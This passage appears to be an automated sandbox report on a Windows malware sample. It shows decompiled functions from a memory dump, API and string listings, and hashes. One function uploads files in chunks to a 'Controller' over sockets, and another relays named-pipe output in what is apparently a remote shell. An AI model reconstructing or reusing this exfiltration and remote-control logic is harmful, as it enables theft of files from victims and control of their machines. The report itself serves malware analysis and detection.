																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E0043A504();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x46b4d0; // 0x2fba800
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x46b4d4 = E0043F348(_t246, 1, 4);
																				E004401F5(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x46b4d0 = E0043F348(_t246, 1, 4);
																				E004401F5(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x46b4d0 - _t221; // 0x2fba800
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x46b4d4; // 0x2fce800
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0043D3FB(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x46b4d4; // 0x2fce800
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E004401F5(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E0043A504();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E0043A504();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x46b4d0 = E0043F348(_t231, 1, 4);
										E004401F5(_t218);
										_t298 =  *0x46b4d0; // 0x2fba800
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x46b4d4 - _t218; // 0x2fce800
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x46b4d4 = E0043F348(_t231, 1, 4);
												E004401F5(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x46b4d4 - _t218; // 0x2fce800
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x46b4d4 - _t218; // 0x2fce800
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0043D3F6(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x46b4d0; // 0x2fba800
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E004401F5(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E0043A504();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}

0x004476b6
0x004476bb
0x004476d2
0x004476d4
0x004476d9
0x004476dd
0x004476de
0x004476e0
0x00447730
0x00447735
0x00000000
0x004476e2
0x004476e2
0x004476e4
0x00000000
0x004476e6
0x004476e6
0x004476ea
0x004476f0
0x004476f3
0x004476f6
0x004476fc
0x004476ff
0x00447704
0x00447706
0x00447709
0x0044770a
0x0044770a
0x00447710
0x00447712
0x00447714
0x004477a8
0x004477ab
0x004477ad
0x004477af
0x004477b0
0x004477b1
0x004477b6
0x004477bb
0x004477bd
0x00447807
0x00447807
0x0044780a
0x00000000
0x00447810
0x00447810
0x00447812
0x00447815
0x00447815
0x00447818
0x0044781a
0x00000000
0x00447820
0x00447820
0x00447826
0x00000000
0x0044782c
0x0044782c
0x0044782e
0x00447836
0x00447838
0x0044783d
0x00447840
0x00447842
0x00000000
0x00447848
0x00447848
0x0044784b
0x0044784d
0x00447850
0x00447853
0x00000000
0x00447853
0x00447842
0x00447826
0x0044781a
0x004477bf
0x004477bf
0x004477c1
0x00000000
0x004477c3
0x004477c6
0x004477cc
0x004477cf
0x004477d2
0x004477e6
0x004477e6
0x004477e9
0x00000000
0x00000000
0x004477de
0x004477e2
0x004477e5
0x004477e5
0x004477e5
0x004477eb
0x004477ed
0x004477f5
0x004477f7
0x004477fc
0x004477ff
0x00447801
0x00447803
0x00447857
0x00447857
0x00447857
0x004477d4
0x004477d4
0x004477d7
0x004477d9
0x004477d9
0x0044785d
0x00447860
0x00000000
0x00447866
0x00447866
0x00447868
0x0044786b
0x0044786b
0x0044786d
0x0044786e
0x0044786e
0x0044787a
0x00447882
0x00447885
0x00447886
0x00447888
0x004478d1
0x004478d2
0x00000000
0x0044788a
0x00447891
0x00447896
0x00447899
0x0044789b
0x004478dd
0x004478de
0x004478df
0x004478e0
0x004478e1
0x004478e2
0x004478e7
0x004478eb
0x004478ed
0x004478f0
0x004478f1
0x004478f4
0x004478f6
0x00447908
0x00447909
0x0044790a
0x0044790d
0x0044790f
0x00447914
0x00447918
0x00447919
0x0044791b
0x0044796c
0x00447971
0x00000000
0x0044791d
0x0044791d
0x0044791f
0x00000000
0x00447921
0x00447921
0x00447927
0x00447929
0x0044792d
0x00447930
0x00447933
0x00447939
0x0044793b
0x0044793c
0x00447942
0x00447945
0x00447947
0x00447947
0x0044794d
0x0044794f
0x004479dc
0x004479e7
0x004479ea
0x004479ef
0x004479f4
0x004479f6
0x00447a40
0x00447a40
0x00447a43
0x00000000
0x00447a49
0x00447a49
0x00447a4b
0x00447a4e
0x00447a4e
0x00447a51
0x00447a53
0x00000000
0x00447a59
0x00447a59
0x00447a5f
0x00000000
0x00447a65
0x00447a65
0x00447a67
0x00447a6f
0x00447a71
0x00447a76
0x00447a79
0x00447a7b
0x00000000
0x00447a81
0x00447a81
0x00447a84
0x00447a86
0x00447a89
0x00447a8c
0x00000000
0x00447a8c
0x00447a7b
0x00447a5f
0x00447a53
0x004479f8
0x004479f8
0x004479fa
0x00000000
0x004479fc
0x004479ff
0x00447a05
0x00447a08
0x00447a0b
0x00447a1f
0x00447a1f
0x00447a22
0x00000000
0x00000000
0x00447a17
0x00447a1b
0x00447a1e
0x00447a1e
0x00447a1e
0x00447a24
0x00447a26
0x00447a2e
0x00447a30
0x00447a35
0x00447a38
0x00447a3a
0x00447a3c
0x00447a90
0x00447a90
0x00447a90
0x00447a0d
0x00447a0d
0x00447a10
0x00447a12
0x00447a12
0x00447a96
0x00447a99
0x00000000
0x00447a9f
0x00447a9f
0x00447aa1
0x00447aa1
0x00447aa4
0x00447aa4
0x00447aa7
0x00447aaa
0x00447aaa
0x00447ab5
0x00447ab9
0x00447ac1
0x00447ac4
0x00447ac5
0x00447ac7
0x00447b0e
0x00447b0f
0x00000000
0x00447ac9
0x00447ad1
0x00447ad6
0x00447ad9
0x00447adb
0x00447b1a
0x00447b1b
0x00447b1c
0x00447b1d
0x00447b1e
0x00447b1f
0x00447b24
0x00447b27
0x00447b28
0x00447b2b
0x00447b2c
0x00447b2f
0x00447b31
0x00447b3a
0x00447b3c
0x00447b3e
0x00447b40
0x00447b42
0x00447b42
0x00447b45
0x00447b46
0x00447b46
0x00447b42
0x00447b4c
0x00447b57
0x00447b5a
0x00447b5b
0x00447b5d
0x00447bc4
0x00447bc4
0x00000000
0x00447b5f
0x00447b5f
0x00447b62
0x00447bb4
0x00447bb6
0x00447bbc
0x00000000
0x00447b64
0x00447b64
0x00447b67
0x00447b67
0x00447b69
0x00447b69
0x00447b6b
0x00447b6b
0x00447b6e
0x00447b6e
0x00447b70
0x00447b71
0x00447b71
0x00447b75
0x00447b79
0x00447b7d
0x00447b87
0x00447b8a
0x00447b8f
0x00447b92
0x00447b96
0x00000000
0x00447b98
0x00447ba0
0x00447ba5
0x00447ba8
0x00447baa
0x00447bc9
0x00447bcb
0x00447bcc
0x00447bcd
0x00447bce
0x00447bcf
0x00447bd0
0x00447bd5
0x00447bd8
0x00447bd9
0x00447bdb
0x00447bdc
0x00447bdd
0x00447bde
0x00447be1
0x00447be3
0x00447bec
0x00447bed
0x00447bef
0x00447bf1
0x00447bf3
0x00447bf6
0x00447bf7
0x00447bf9
0x00447bfb
0x00447bfb
0x00447bfe
0x00447bff
0x00447bff
0x00447bfb
0x00447c03
0x00447c0e
0x00447c12
0x00447c14
0x00447c82
0x00447c82
0x00000000
0x00447c16
0x00447c16
0x00447c18
0x00447c72
0x00447c73
0x00447c79
0x00000000
0x00447c1a
0x00447c1c
0x00447c1c
0x00447c1e
0x00447c1e
0x00447c20
0x00447c20
0x00447c23
0x00447c23
0x00447c26
0x00447c29
0x00447c29
0x00447c35
0x00447c39
0x00447c41
0x00447c47
0x00447c4c
0x00447c4f
0x00447c53
0x00000000
0x00447c55
0x00447c5d
0x00447c62
0x00447c65
0x00447c67
0x00447c87
0x00447c89
0x00447c8a
0x00447c8b
0x00447c8c
0x00447c8d
0x00447c8e
0x00447c93
0x00447c96
0x00447c99
0x00447c9a
0x00447c9b
0x00447c9c
0x00447ca2
0x00447ca4
0x00447ca7
0x00447cd3
0x00447cd3
0x00447cd3
0x00447cd8
0x00447ca9
0x00447ca9
0x00447cac
0x00447cb2
0x00447cb7
0x00447cba
0x00447cbc
0x00000000
0x00447cbe
0x00447cc0
0x00447cc3
0x00447cc5
0x00447ce1
0x00447ce3
0x00447cc7
0x00447cc7
0x00447cc9
0x00000000
0x00000000
0x00000000
0x00000000
0x00447cc9
0x00447cc5
0x00000000
0x00447ccb
0x00447ccb
0x00447cce
0x00447cce
0x00000000
0x00447cac
0x00447cda
0x00447ce0
0x00000000
0x00000000
0x00000000
0x00447c67
0x00000000
0x00447c69
0x00447c69
0x00447c6c
0x00447c6c
0x00447c70
0x00447c70
0x00000000
0x00447c70
0x00447c18
0x00447be5
0x00447be5
0x00447c7d
0x00447c81
0x00447c81
0x00000000
0x00000000
0x00000000
0x00447baa
0x00000000
0x00447bac
0x00447bac
0x00447baf
0x00447baf
0x00000000
0x00447bb3
0x00447b62
0x00447b33
0x00447b33
0x00447bbf
0x00447bc3
0x00447bc3
0x00447add
0x00447ae1
0x00447ae4
0x00447aee
0x00447af6
0x00447afc
0x00447afe
0x00447b00
0x00447b05
0x00447b05
0x00447b08
0x00447b08
0x00000000
0x00447afe
0x00447adb
0x00447ac7
0x00447a99
0x004479fa
0x00447955
0x00447955
0x0044795a
0x0044795d
0x0044798a
0x0044798a
0x0044798c
0x00000000
0x0044798e
0x0044798e
0x00447990
0x004479bb
0x004479c5
0x004479ca
0x004479cf
0x00000000
0x00447992
0x0044799c
0x004479a1
0x004479a6
0x004479a9
0x004479af
0x00000000
0x004479b1
0x004479b1
0x004479b7
0x004479b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004479b9
0x004479af
0x00447990
0x0044795f
0x0044795f
0x00447961
0x00000000
0x00447963
0x00447963
0x00447968
0x0044796a
0x004479d2
0x004479d2
0x004479d8
0x004479da
0x00447977
0x00447977
0x00447977
0x0044797a
0x0044797b
0x00447982
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044796a
0x00447961
0x0044795d
0x0044794f
0x0044791f
0x004478f8
0x004478f8
0x004478fd
0x00447903
0x00447985
0x00447989
0x00447989
0x0044789d
0x004478a6
0x004478ae
0x004478b2
0x004478b9
0x004478bf
0x004478c1
0x004478c3
0x004478c8
0x004478c8
0x004478cb
0x004478cb
0x00000000
0x004478c1
0x0044789b
0x00447888
0x00447860
0x004477c1
0x0044771a
0x0044771a
0x0044771d
0x0044774e
0x0044774e
0x00447750
0x00447760
0x00447765
0x0044776a
0x00447770
0x00447773
0x00447775
0x00000000
0x00447777
0x00447777
0x0044777d
0x00000000
0x0044777f
0x00447789
0x0044778e
0x00447793
0x00447796
0x0044779c
0x00000000
0x00000000
0x00000000
0x00000000
0x0044779c
0x0044777d
0x00447752
0x00447752
0x00000000
0x00447752
0x0044771f
0x0044771f
0x00447725
0x00000000
0x00447727
0x00447727
0x0044772c
0x0044772e
0x0044779e
0x0044779e
0x004477a4
0x004477a4
0x004477a6
0x0044773b
0x0044773b
0x0044773b
0x0044773e
0x0044773f
0x00447746
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044772e
0x00447725
0x0044771d
0x00447714
0x004476e4
0x004476bd
0x004476bd
0x004476c2
0x004476c8
0x00447749
0x0044774d
0x0044774d
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 004476D4
_free.LIBCMT ref: 0044773F
_free.LIBCMT ref: 00447765
_free.LIBCMT ref: 0044778E
_free.LIBCMT ref: 004477C6
_free.LIBCMT ref: 004477F7
_free.LIBCMT ref: 00447838
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 004478B9
_free.LIBCMT ref: 004478D2
_wcschr.LIBVCRUNTIME ref: 0044790F
_free.LIBCMT ref: 0044797B
_free.LIBCMT ref: 004479A1
_free.LIBCMT ref: 004479CA
_free.LIBCMT ref: 004479FF
_free.LIBCMT ref: 00447A30
_free.LIBCMT ref: 00447A71
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447AF6
_free.LIBCMT ref: 00447B0F

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
String ID:
API String ID: 2719235668-0
Opcode ID: 370d3132cb26f4552ee1daba6f874517c8083149b8d61390565b9232581f8842
Instruction ID: db3f33f972ccc31960696266c8304923ec6ec277b5ade58ccf050fecc9e19cec
Opcode Fuzzy Hash: 370d3132cb26f4552ee1daba6f874517c8083149b8d61390565b9232581f8842
Instruction Fuzzy Hash: 15D148B1908300AFFB21AF758881A6F77A8EF05354F14416FE945A7382EB7D9902C79D

Uniqueness

Uniqueness Score: -1.00%

Function 004064A2, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 345
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004064A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
				long _t136;
				void* _t137;
				signed int _t138;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				long _t198;
				signed int _t203;
				void* _t216;
				union _LARGE_INTEGER _t280;
				intOrPtr _t281;
				union _LARGE_INTEGER* _t295;
				void* _t297;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t278 = __edx;
				_v68 = __ecx;
				E0040498B(__ecx);
				_t302 = _t301 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t299 = _v68;
				E00404A08(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t310 = _t297 - 0xffffffff;
				if(_t297 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t297,  &_v80);
					_t203 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t203;
					_v32 = _t203;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E0040427F(0,  &_v112, _a4);
					_t119 = E0041733B( &_v136,  &_v112);
					_t303 = _t302 - 0x18;
					_t280 = "Uploading file to Controller: ";
					E004075C2(0, _t303, _t280, _t297, __eflags, _t119);
					_t304 = _t303 - 0x14;
					E00402084(0, _t304, "[Info]");
					E00416C80(0, _t297);
					_t305 = _t304 + 0x30;
					E00401FC7();
					E00401EF0();
					_v36 = 1;
					_v40 = 0;
					_t126 = E00450880(_v52, _v48, 0x186a0, 0);
					_t210 = _t280;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t280;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t297);
						E00404E0B(_t299);
						_t198 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t281 = _v32;
									__eflags = _v20 - _t281;
									if(__eflags >= 0) {
										_t210 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t210;
											_v20 = _t281;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t210;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = E0042F4C6(_t210, _t281, _t299, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t306 = _t305 - 0x18;
										_t216 = _t305 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t306 = _t305 - 0x18;
											_t216 = _t305 - 0x18;
											_push("ReadFile error");
											L23:
											E00402084(0, _t216);
											E00402084(0, _t306 - 0x18, "[ERROR]");
											E00416C80(0, _t297);
											E0042F4CF(_v12);
											CloseHandle(_t297);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												E0042F4CF(_v12);
												CloseHandle(_t297);
												E00404E0B(_t299);
												_t145 = 1;
												goto L25;
											} else {
												E0040427F(0,  &_v112, _a4);
												_t154 = E004020AB(0,  &_v472, _t281, __eflags, _v12, _v24);
												_t305 = _t305 - 0x18;
												_t156 = E00417260(0x46c238,  &_v448, _v88, _v84);
												_t157 = E00417260(0x46c238,  &_v424, _v36, _v40);
												E00402F1D(_t305, E00402F93(0x46c238,  &_v136, E00402F93(0x46c238,  &_v160, E00402F93(0x46c238,  &_v184, E00402F1D( &_v208, E00402F93(0x46c238,  &_v232, E00402F1D( &_v256, E00402F93(0x46c238,  &_v280, E00402F93(0x46c238,  &_v304, E00402F93(0x46c238,  &_v328, E00402F93(0x46c238,  &_v352, E00402F93(0x46c238,  &_v376, E0041739C(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
												_t299 = _v68;
												_push(0x52);
												_t173 = E00404AA4(0x46c238, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401EF0();
												__eflags = 0x46c200 | _t173 == 0xffffffff;
												if((0x46c200 | _t173 == 0xffffffff) != 0) {
													E00404E0B(_t299);
													CloseHandle(_t297);
													E0042F4CF(_v12);
													_t198 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									E0042F4CF(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t295 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t210 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t210;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t295;
									__eflags = _t295 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t210 - _v52;
							} while (_t210 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E004020EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
					_push(0x53);
					E00404AA4(0, 0x46c2e8, _t278, _t310);
					L24:
					E00404E0B(_t299);
					_t145 = 0;
					L25:
					_t198 = _t145;
				}
				L18:
				E00401FC7();
				E00401FC7();
				E00401FC7();
				return _t198;
			}

0x004064a2
0x004064ae
0x004064b1
0x004064b6
0x004064c0
0x004064c1
0x004064c2
0x004064c3
0x004064c4
0x004064c9
0x004064d0
0x004064ea
0x004064f3
0x004064f5
0x004064f8
0x0040651c
0x00406521
0x00406524
0x0040652a
0x0040652d
0x00406533
0x00406536
0x0040653c
0x0040653f
0x00406542
0x00406550
0x00406555
0x00406558
0x00406560
0x00406565
0x0040656f
0x00406574
0x00406579
0x00406582
0x0040658a
0x00406595
0x004065a0
0x004065a6
0x004065ae
0x004065b0
0x004065b3
0x004065b6
0x004065b8
0x004065bd
0x004065c0
0x004065c3
0x00406864
0x00406865
0x0040686d
0x00406872
0x004065c9
0x004065c9
0x004065d4
0x004065d7
0x004065dd
0x004065e0
0x004065e0
0x004065e5
0x004065e5
0x004065e5
0x004065e5
0x004065e8
0x004065eb
0x004065ed
0x004065f0
0x004065f6
0x004065f6
0x004065f8
0x004065fb
0x004065f2
0x004065f2
0x004065f4
0x00000000
0x00000000
0x004065f4
0x004065f0
0x004065fe
0x004065ff
0x00406605
0x0040660a
0x00406610
0x00406614
0x0040661a
0x0040661c
0x004068da
0x004068dd
0x004068df
0x00000000
0x00406622
0x0040662f
0x00406635
0x00406637
0x004068ce
0x004068d1
0x004068d3
0x004068e4
0x004068e4
0x004068f3
0x004068f8
0x00406900
0x00406909
0x00000000
0x0040663d
0x0040663d
0x00406641
0x004068b5
0x004068bc
0x004068c4
0x004068cb
0x00000000
0x00406647
0x0040664d
0x0040665e
0x00406663
0x00406680
0x00406695
0x00406754
0x00406759
0x0040675d
0x00406761
0x00406766
0x00406772
0x0040677d
0x00406788
0x00406793
0x0040679e
0x004067a9
0x004067b4
0x004067bf
0x004067ca
0x004067d5
0x004067e0
0x004067eb
0x004067f6
0x00406801
0x0040680c
0x00406814
0x00406819
0x0040681b
0x00406899
0x0040689f
0x004068a8
0x004068ae
0x00000000
0x00000000
0x00000000
0x0040681b
0x00406641
0x00406637
0x00000000
0x0040681d
0x00406820
0x00406825
0x00406828
0x0040682b
0x00406832
0x00406835
0x00406839
0x00406841
0x00406842
0x00406845
0x00406847
0x0040684a
0x0040684d
0x00406850
0x00406850
0x00406859
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040685b
0x0040685b
0x0040685b
0x00000000
0x004065cb
0x004065cb
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x004065ce
0x004065c9
0x004064fa
0x00406503
0x00406508
0x0040650f
0x0040690f
0x00406911
0x00406916
0x00406918
0x00406918
0x00406918
0x00406874
0x00406877
0x0040687f
0x00406887
0x00406894

APIs

Part of subcall function 00404A08: connect.WS2_32(?,?,00000010), ref: 00404A23

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
GetFileSizeEx.KERNEL32(00000000,?), ref: 00406524
__aulldiv.LIBCMT ref: 004065A6
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00406614
ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0040662F

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11

Strings

[Info], xrefs: 0040656A
Uploading file to Controller: , xrefs: 00406558
[ERROR], xrefs: 004068EE
ReadFile error, xrefs: 004068D3
SetFilePointerEx error, xrefs: 004068DF

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
API String ID: 1319223106-2190262076
Opcode ID: 95301e0d2d65501c773a32fec4aba385de55b1fcfdaf5492f69305316ec70273
Instruction ID: 173749a7d42c5eabba2dba03019d43edcf8f50480dc145d367e539a2da324ad2
Opcode Fuzzy Hash: 95301e0d2d65501c773a32fec4aba385de55b1fcfdaf5492f69305316ec70273
Instruction Fuzzy Hash: F5C16B31A00219ABCB14FBA5DD829EEB7B5AF44304F10817FF406B62D1EF385A449F99

Uniqueness

Uniqueness Score: -1.00%

Function 10596458, Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 283
sleepfileprocessCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10596458(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				int _t98;
				intOrPtr* _t107;
				intOrPtr _t138;
				signed int _t146;
				signed int _t147;
				intOrPtr* _t150;
				long _t151;
				void* _t155;
				intOrPtr* _t156;

				_t156 = _t155 - 0x3c;
				_push(_t146);
				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t98 = 0;
				if( *0x46dce8 >  *((intOrPtr*)(_t138 + 4))) {
					E105BFF82(0x46dce8);
					_t160 =  *0x46dce8 - _t147;
					if( *0x46dce8 == _t147) {
						E105956BC(0, 0x46dc60, 0);
						E105C030C(_t160, 0x4527b3);
						 *_t156 = 0x46dce8;
						E105BFF43();
					}
				}
				if( *0x46dcc8 >  *((intOrPtr*)(_t138 + 4))) {
					E105BFF82(0x46dcc8);
					_t162 =  *0x46dcc8 - _t147;
					if( *0x46dcc8 == _t147) {
						E10592F43(_t98, 0x46dcf0);
						E105C030C(_t162, 0x4527a9);
						E105BFF43(0x46dcc8);
					}
				}
				_t100 =  &_v40;
				E10592F43(_t98,  &_v40);
				_t139 = 0x46c2d0;
				_v8 = _t98;
				if( *0x46bae2 != _t98) {
					L12:
					_v12 = _t98;
					PeekNamedPipe( *0x46dcd0, _t98, _t98, _t98,  &_v12, _t98);
					if(_v12 <= _t98) {
						_t156 = _t156 - 0x18;
						E10592EF2(_t98, _t156, 0x45f6bc);
						_push(0x62);
						_t147 = E10595912(_t98, 0x46dc60, 0x45f6c0, __eflags);
						goto L21;
					}
					_push(_v12);
					_t56 = E105CA364(_t100);
					_t140 = _t56;
					ReadFile( *0x46dcd0, _t56, _v12,  &_v16, _t98);
					if(_v16 <= _t98) {
						L19:
						L105CA35F(_t140);
						_t139 = 0x46c2d0;
						goto L21;
					}
					if(_v8 <= _t98) {
						L17:
						E10592EF2(_t98,  &_v64, _t140);
						_t156 = _t156 - 0x18;
						_t107 = _t156;
						_push(_v16);
						_push(_t98);
						L18:
						E10596882(_t98, _t107, 0x45f6c0, _t172);
						_t147 = E10595912(_t98, 0x46dc60, 0x45f6c0, _t172, 0x62,  &_v64);
						E10592E35();
						goto L19;
					}
					_t66 = E105CA37E(_t140, E10592E03( &_v40), _v8);
					_t156 = _t156 + 0xc;
					_t172 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E10592EF2(_t98,  &_v64, _t140);
					_t156 = _t156 - 0x18;
					_t107 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t70 = E105968DD(0x45f6c0);
					_t164 = _t70;
					if(_t70 == 0) {
						L26:
						E10595C79(0x46dc60);
						CloseHandle( *0x46dcd0);
						CloseHandle( *0x46dcec);
						 *0x46bae2 = _t98;
						_t98 = 1;
						L27:
						E10592E35();
						E10592E35();
						return _t98;
					}
					E10596879(_t98, 0x46dcf0, E105CA6F8(_t98, _t164, 0x45f6c8));
					E10596870(_t98, 0x46dcf0, 0x46c2d0, 0x45f6d4);
					_t150 =  *0x45327c;
					_push(_t98);
					_push(0x46dc08);
